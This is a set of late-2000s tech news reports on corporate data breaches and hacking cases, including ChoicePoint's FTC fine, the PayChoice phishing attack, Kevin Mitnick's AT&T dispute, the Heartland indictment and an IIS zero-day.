ChoicePoint, one of the nation's largest data brokers, has been fined $275,000 by the U.S. Federal Trade Commission for a data breach that exposed personal information of 13,750 people last year.
In April 2008, ChoicePoint turned off a key electronic security tool that it used to monitor access to one of its databases and failed to notice the problem for four months, according to an FTC statement.
During that period, unauthorized searches were conducted for 30 days on a ChoicePoint database that contained Social Security numbers and other sensitive information, the FTC said.
The FTC alleged that ChoicePoint's conduct violated a 2006 court order requiring the company to institute a comprehensive information security program following a 2005 breach that compromised the personal information of more than 163,000 people and resulted in at least 800 cases of identity fraud. The company was ordered to pay $10 million in civil penalties and $5 million to consumers in that case.
To settle the recent charges, ChoicePoint agreed to pay the fine and provide reports on its data protection practices to the FTC every two months for two years.
Meanwhile, payroll processor PayChoice has had two data breaches in less than a month. On October 1, the company said it was investigating a breach in which targeted e-mails were sent to customers that attempted to trick them into downloading malware.
Then last week, PayChoice told customers it was again shutting down its online portal after clients started noticing fake employees being added to their payroll in what is likely the second stage of a broader attack, according to the Security Fix blog.
It appears that attackers stole login IDs and passwords by exploiting a weakness in the Web site component that allows customers to change their portal passwords, the report said. The usernames and passwords were then included in the e-mails sent out to customers a few weeks ago.
Payroll processor PayChoice said Thursday it is investigating a breach in which customers received targeted e-mails purporting to be from the company but were designed to trick people into downloading malware.
Workers received e-mails last week that directed them to download a browser plug-in or visit a Web site so they could continue accessing the Onlineemployer.com PayChoice portal. Malware in the download and on the Web site turned out to exploit holes in Internet Explorer, Adobe Flash, and Adobe Reader, PayChoice said.
The e-mails were targeted to individuals and included their user names, login IDs, and partial passwords, thus increasing the chance that recipients would be likely to fall for the ruse.
In a statement, PayChoice did not say how many people received the e-mails but said most of the employees served by PayChoice do not use the portal. PayChoice, based in Moorestown, N.J., provides payroll software and services to 125,000 businesses.
"Within hours of the attack, the company notified its clients, shut down the site www.onlineemployer.com and deployed further security measures to protect client information before restoring access to the system," the company said in the statement. "PayChoice also immediately notified the authorities and is working with federal law enforcement to find those responsible."
The company confirmed a report on The Washington Post's Security Fix blog that the malware downloaded a Trojan horse dubbed "Bredolab," which tries to put additional malicious files on the system and to disable host-based intrusion prevention sytems, according to Microsoft's Malware Protection Center.
"PayChoice discovered a security breach in its online system on Wednesday, September 23, 2009," PayChoice Chief Executive Robert Digby said in an earlier statement. "We are handling this incident with the highest level of attention as well as concern for our clients, software customers and the employees they serve."
The company has hired two forensic experts to investigate the breach, Digby said.
The e-mail was sent through Yahoo's Web email service and the Web sites linked to in the emails were hosted on servers in Poland, according to an e-mail PayChoice sent to customers after the incident that was obtained by Security Fix.
The PayChoice portal displays this warning about the social engineering e-mail.
(Credit: OnlineEmployer.com)
Kevin Mitnick
(Credit: Declan McCullagh/CBS Interactive)After having his AT&T wireless account breached and his personal information posted on the Web, famed hacker Kevin Mitnick thought the least the cellular service provider could do was compensate him for his troubles.
Instead, the company informed Mitnick it plans to cancel his contract and not pay damages for the breach, he said. (His service was still working Thursday afternoon.) Now he may sue.
"AT&T wants me off their network because they can't secure my account, and after being a loyal customer for almost a decade I find that reprehensible," he told CNET News on Thursday. "It apparently is more cost effective to drop me than to secure their customer's information."
"My attorney is going to review my contract to see what, if any, restrictions are in my service agreement," he said. "I may file a lawsuit for invasion of privacy for the failure to adequately protect my information."
The irony is that he speculates that whoever is responsible for getting into his account used social engineering to do so. Mitnick spent five years in jail for breaking into computer networks, mostly using social engineering to get information out of insiders that enabled him to access their networks.
He describes such social engineering techniques in fictional stories in his book "The Art of Deception," including examples involving PacBell in which workers at retail stores reveal customer account details over the phone to someone they think works for the company.
"These guys probably read my book and decided to steal my information using social engineering because it is so easy," he said. "I told AT&T about this and they just ignored it."
"The bigger issue is that this ineffective security affects all AT&T customers," he said. "They need to start shoring up their defenses."
Mitnick learned in June that someone had posted his address, land and mobile phone numbers, PIN, e-mail address, instant messenger handles, and the last four digits of his Social Security number on the Web in March.
When he failed to get a response from AT&T after he complained, he called a lawyer who asked AT&T to pay an undisclosed amount for damages to his reputation and property rights, he said.
"We investigated Mr. Mitnick's claims and determined they were without any foundation," said AT&T spokeswoman Jenny Bridges. "We refused Mr. Mitnick's demands for money, but did offer to let him out of his contractual obligations so that he could find a carrier that he would be comfortable with."
Asked if Mitnick could keep AT&T as his provider, Bridges said she could not comment beyond that statement.
Mitnick's high-profile status makes him a celebrity among some hackers and a popular target for others. He's had his Web site hacked numerous times over the years, including twice in the past several months. He's even had trouble with Facebook after the social networking site disabled his account, believing him to be an impostor.
Most recently, Mitnick's site was among a group of security sites that were hacked and publicized on the eve of the Black Hat conference last month. As a result of the hacking, Mitnick was asked by his Web hosting provider, HostedHere.net, to find another place to host his site.
This isn't the first time Mitnick's AT&T account information apparently has been breached.
CNET News learned almost a year ago that someone had gotten access to Mitnick's mobile account while he was on a trip to Bogota, Colombia, but at the request of Mitnick at that time, agreed not to publish the information while the case was being investigated.
On his way to Colombia, during a stopover in Los Angeles, Mitnick received warning that his AT&T account would be breached with a social-engineering attack, he said in an instant message exchange in September 2008. He called AT&T with the details and asked it to take extra precautions to protect his account and require someone trying to change the account to provide the password verbally and not just the Social Security number, he said. Despite that effort, when he landed hours later, his password had been reset and the account was no longer in his control.
"I learn that these hackers (they called to warn me first) called an ATT Corporate store in Idaho (I have the rep's name) and she changed my e-mail address to what the hackers requested. So they just did a pw reset," he wrote in the IM exchange.
Asked about it in a follow up conversation months later, Mitnick said the matter had been resolved and declined to comment further.
That Colombia trip was noteworthy for Mitnick for other reasons. On his return, Mitnick was detained for four hours and his computer equipment inspected after he landed in the Atlanta airport for unknown reasons.
Two Russians and a Florida man were charged on Monday with hacking into Heartland Payment Systems, 7-Eleven, and the Hannaford Brothers supermarket chain, and stealing data related to more than 130 million credit and debit cards.
The indictment names 28-year-old Albert Gonzalez of Miami, who already has been charged with stealing data related to 40 million credit cards from eight major retailers, including TJ Maxx, and two unnamed co-conspirators based in Russia.
The breach involving Heartland and the others is believed to be the largest hacking and identity theft case ever prosecuted by the U.S. Department of Justice. In addition to Heartland, 7-Eleven, and Hannaford Brothers, it involves two unnamed corporate victims, according to a statement from the U.S. Attorney's office.
The three men were indicted on charges of conspiring to hack into computer networks and stealing data as far back as October 2006. Gonzalez, whose aliases include "segvec" and "soupnazi," and the others allegedly found victims on a list of Fortune 500 companies and visited retail locations to see what type of checkout systems they used.
They used an SQL injection attack to steal the data and used computers in California, Illinois, New Jersey, Latvia, Ukraine, and the Netherlands for storing malware and stolen data and launching attacks, according to the indictment. In an SQL injection attack, a small malicious script is inserted, exploiting a vulnerability in the database layer of an application that feeds information to the Web site.
They also allegedly installed backdoors and sniffers to intercept data in real time as it was processed by the victims and tried to hide their actions by accessing the victim networks through proxy computers, modifying their software so as to evade detection by antivirus programs and programming it to delete traces of the malware from victim networks, according to the indictment.
The men also tried to sell the stolen data to others, the indictment alleges. They are charged with conspiracy to gain unauthorized access to computers, commit fraud in connection with computers and damage computers, as well as conspiracy to commit wire fraud. They face up to 35 years in prison as well as a fine of $1.25 million.
Gonzalez, who is in federal custody, was charged in May 2008 in New York with hacking the computer network of Dave & Buster's restaurant chain and was named in an indictment in Massachusetts in August 2008 related to the TJX breach. Other alleged victims in those cases include BJ's Wholesale Club, OfficeMax, Boston Market, Barnes & Noble, Sports Authority, Forever 21, and DSW. He faces trial on the New York charges next month.
Heartland reported the breach on presidential Inauguration Day in January and said that although it occurred last year, it found evidence of the intrusion just the week prior.
Formerly a federal government informant, Gonzalez also was arrested in New Jersey in 2003 on charges related to ATM and debit card fraud.
Network Solutions is investigating a breach on its servers that may have led to the theft of credit card data of 573,928 people who made purchases on Web sites hosted by the company.
Networks Solutions notified 4,343 of its nearly 10,000 e-commerce merchant customers on Friday about the breach. It affects 573,928 cardholders whose name, address, and credit card number were exposed between March 12 and June 8, said Susan Wade, a spokeswoman for Network Solutions.
(Credit:
Network Solutions)
Mysterious code was discovered in early June on servers hosting e-commerce customer sites during routine maintenance, she said. The company called in a third-party forensics team to help with the investigation, and the team was able to crack some of the code on July 13, determining that it could be related to credit card data, she added.
Credit card transactions were intentionally diverted by an unknown source from certain Network Solutions servers to servers outside, Network Solutions wrote in an e-mail to merchant customers.
"So we notified law enforcement and began the process of notifying our customers," Wade said. "At this point, we don't have a reason to believe that (the data) has been used, but we are working with the credit card companies," nonetheless.
Network Solutions also is paying to have credit-monitoring specialist TransUnion help the merchants notify their customers according to data breach notification laws in effect in certain states. Affected consumers will get 12 months of free credit-monitoring services.
It's unknown how the malicious code got onto the system and where it came from, Wade said.
Merchants and consumers can get more information on the Care and Protect Web site Network Solutions has set up. "We really feel terribly about this," Wade said.
"We store credit card data in an encrypted manner, and we are PCI (Payment Card Industry)-compliant. Unfortunately, any company operating in our business could have become a victim of this type of invasion," the company said on a blog post on the customer information Web site. "In this situation, the unauthorized code appears to have transmitted information about credit card transactions as they were being completed; it did not involve a vulnerability in the way we store data in our systems."
The breach does not affect Network Solutions' other businesses, which include domain registration, e-mail hosting, and online marketing.
CEOs and their senior executives don't see eye to eye on key security issues, according to a new survey.
Many CEOs don't consider their own companies vulnerable to security attacks and are confident in their ability to combat those attacks, says a survey released Wednesday. However, those findings contrast with the opinions of senior executives who report to the CEO. They see their companies as more vulnerable and are not confident they can stop data theft. The survey was sponsored by security company Ounce Labs and conducted by security researcher Ponemon Institute.
The survey sought to determine how aware CEOs and other senior executives are of their own data projection efforts--how effective they are, how they justify the cost of security, and whether they support the goals of the organization.
The survey found that 82 percent of senior executives said their organization has experienced a data breach, with 94 percent saying they've been hit in the last six months. About 53 percent say they're attacked on a daily or even hourly basis.
Only 58 percent of the senior execs are confident in their company's ability to identify and respond to breaches that result in the theft of information. And just 32 percent think their company is rarely attacked.
Among CEOs, 93 percent are confident in their organization's ability to identify and thwart security breaches. And 48 percent said they believe their organizations are rarely attacked.
(Credit:
Ounce Labs)
The responsibility for securing a company's data was also a question mark. Among CEOs, 53 percent felt the chief information officer is accountable for data protection, while only 25 percent of other senior executives felt the same way. And whoever is responsible, that person's job is seen as safe. Around 85 percent of executives questioned believe a failure to stop a security attack under their watch would not jeopardize their job.
(Credit:
Ounce Labs)
To gather the data, Ponemon Institute questioned 30 CEOs and 183 other top-level executives who report to CEOs, including chief operating officers, division presidents, and chief information officers, over a six-month period ending in June.
Twitter's latest security hole has less to do with its users than it does with its staff, but lessons can be learned on both sides.
In the case of Jason Goldman, who is currently Twitter's director of product management, the simplicity of Yahoo's password recovery system was enough to let a hacker get in and gain information from a number of other sites, including access to other Twitter staff's personal accounts.
The aftermath of the hack, which took place in May, is just now coming to fruition. Documents that a hacker by the alias of Hacker Croll recovered from Goldman's account and others (including Twitter co-founder Evan Williams) could be a treasure trove of inside information about the company and its plans.
While Croll was planning to release the entire batch publicly (and at once), tech blog TechCrunch posted news late Tuesday that it had received them and was considering posting the details of at least some of them.
Although it seems that Twitter has been thrust into this situation a bit unfairly, a hack along these lines could have happened to the executives of more Web companies than anybody would like to admit. What it really highlights is the extreme interconnectedness of the social Web: with the likes of e-mail contact importing and data-portability services like Facebook Connect now commonplace, a savvy hacker can have access to multiple accounts simply by accessing one.
A post Wednesday on Twitter's official blog highlights just how far-reaching this can be.
"About a month ago, an administrative employee here at Twitter was targeted and her personal email account was hacked," the post from co-founder Biz Stone read. "From the personal account, we believe the hacker was able to gain information which allowed access to this employee's Google Apps account which contained Docs, Calendars, and other Google Apps Twitter relies on for sharing notes, spreadsheets, ideas, financial details and more within the company."
Following that attack, Twitter conducted a security audit, and Stone's post says that there was not a security vulnerability in Google Apps and that Twitter continues to use the suite internally. A separate hack targeted the account of CEO Evan Williams' wife, and from that some of Williams' personal accounts were accessed as well, Stone explained.
But Twitter is front and center in the news these days, and is now talked about as a communications protocol as much as a Web start-up. Not only does that make it a particularly appealing target, but also... Read more
A T-Mobile spokesman said on Tuesday that data someone posted to a security e-mail list over the weekend was legitimate T-Mobile data but not customer information, and that the phone company's network was not hacked or breached as the poster claimed.
The statement raises more questions than it answers. If indeed there was no network hack, could there have been an inside leak? Or could it have been something as low-tech as dumpster diving, in which records are obtained from trash bins outside a company's offices?
All T-Mobile would say is that it is investigating how the information was obtained.
On Saturday, someone posted to the Full Disclosure e-mail list claiming to have hacked into T-Mobile's computer network.
"We have everything, their databases, confidential documents, scripts and programs from their servers, financial documents up to 2009," the poster wrote, adding that the data was being offered up to the highest bidder. As evidence of the hack the post included a bunch of lines of codes that look like they reference some operating systems and possibly IP addresses.
T-Mobile said the data is not customer data, but declined to say what it is. On Monday, T-Mobile said it was investigating the situation.
Then late on Monday, the company issued a statement that said: "Regarding the recent claim on a Web site, we've identified the document from which information was copied, and believe possession of this alone is not enough to cause harm to our customers."
On Tuesday, T-Mobile issued an updated statement that removed that wording and added: "The company is conducting a thorough investigation and at this time has found no evidence that customer information, or other company information, has been compromised. Reports to the contrary are inaccurate and should be corrected."
T-Mobile says the data isn't customer data. So what is it?
(Credit: T-Mobile)
Hackers based in Turkey penetrated two U.S. Army Web servers and redirected traffic from those Web sites to other pages, including one with anti-American and anti-Israeli messages, according to a report in InformationWeek.
The hackers, who go by the group name "m0sted," breached a server at the Army's McAlester Ammunition Plant in Oklahoma on January 26 and a server at the U.S. Army Corps of Engineers' Transatlantic Center in Winchester, Va., on September 19, 2007, the report said.
Investigators believe an SQL injection attack was used to exploit a vulnerability in Microsoft's SQL Server database in order to gain access to the servers.
It is unclear whether any sensitive information was accessed, according to the report.
Search warrants have been served on Microsoft, Yahoo, Google, and other ISPs and e-mail providers, while a criminal investigation is underway at the Defense Department, the U.S. Army's Judge Advocate General's Office, and the Computer Emergency Response Team, InformationWeek reported.
The same group defaced the United Nations Web site in 2007, also using a SQL injection attack.
Updated 6 p.m. PDT with Microsoft comment.
It apparently didn't take long for hackers to try to take advantage of a zero-day hole in Microsoft Internet Information Services (IIS).
Ball State University in Muncie, Ind., told The Register that servers running the program were breached on Monday, the same day Microsoft warned the public about the vulnerability.
Students accessing their iWeb pages on Monday saw messages saying the system had been hacked, The Register reported on Wednesday. There is no evidence data was stolen or malicious files uploaded, however the iWeb accounts were expected to be offline until Thursday or Friday, according to Patty Lucas, a senior help desk support administrator for the university's computing services department.
Microsoft, meanwhile, said it has investigated a public report of a targeted attack on the IIS hole, but did not specify whether it was the Ball State University breach that was looked into.
The investigation "revealed that the vulnerability was not exploited to accomplish this attack," a Microsoft spokeswoman wrote in an e-mail late on Wednesday. "Microsoft is still not aware of attacks that are trying to use this vulnerability or of customer impact at this time."
The computing services department referred a call from CNET News on Wednesday afternoon to the communications department, which was already closed for the day.
The security vulnerability could allow an attacker to gain access to a location that typically requires authentication by using a specially crafted anonymous HTTP request, according to the Microsoft security bulletin. The problem exists in the way that the WebDAV extension for IIS handles HTTP requests.
According to a posting to the Full Disclosure security e-mail list on Friday, the IIS security vulnerability was discovered on May 12 by Nikolaos Rangos.
